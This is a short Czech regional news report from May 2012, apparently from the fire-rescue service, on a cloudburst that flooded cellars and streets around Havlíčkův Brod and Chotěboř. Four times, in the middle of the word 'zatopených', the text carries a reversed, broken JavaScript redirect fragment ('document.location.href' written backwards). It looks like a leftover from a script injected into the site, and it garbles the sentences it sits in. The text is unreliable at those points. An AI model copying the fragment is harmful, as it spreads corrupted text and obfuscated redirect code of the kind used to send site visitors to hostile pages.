Havlíčkobrosko, havlickobrodsko, aktuality, déšť, Vysočina, vysocina
Rainbow page separator

Průtrž mračen napáchala škody na Havlíčkobrodsku

Středa, 9. května 2012

Déšť zasáhl v neděli večer opět Vysočinu a potrápil hlavně Havlíčkobrodsko. Hasiči museli čerpat desítky za[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topených sklepů domů a také v několika případech čistit ucpané kanalizace. Situace byla nejhorší v samotném Havlíčkově Brodě. Celkem zasahovaly jednotky požární ochrany v našem kraji u 22 technických pomocí. Převážně se jednalo o čerpání vody ze za[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topených sklepů domů. Všechny události v souvislosti s deštěm se obešly bez zranění osob. Převážná většina událostí se odehrála od 19:43 hod do 21:30 hod.

Hlášení o první ucpané kanalizaci v Havlíčkově Brodě jsme přijali v 19:43 hod. Havlíčkobrodští profesionální hasiči kanalizaci pročistili. V následujících minutách přijímalo Krajské operační a informační středisko Hasičského záchranného sboru Kraje Vysočina další a další hlášení o ucpaných kanalizacích a za[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topených sklepech v Havlíčkově Brodě. Hasiči museli čerpat vodu ze sklepů domů například na ulicích Jahodova, Ing. Kašpara, kpt. Nováka, Pujmanové, Rozkošská, Humpolecká atd. Celkově musely jednotky v průběhu večera zasahovat v Havlíčkově Brodě dvanáctkrát.

V Chotěboři za[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topila voda na ulici Riegrova nejenom sklepy, ale také celou komunikaci, která musela být na necelou hodinu zcela uzavřena.

Přehled zásahů v souvislosti s deštěm:

Havlíčkobrodsko: 21

Třebíčsko: 1

kpt. Ing. Petra Musilová, DiS.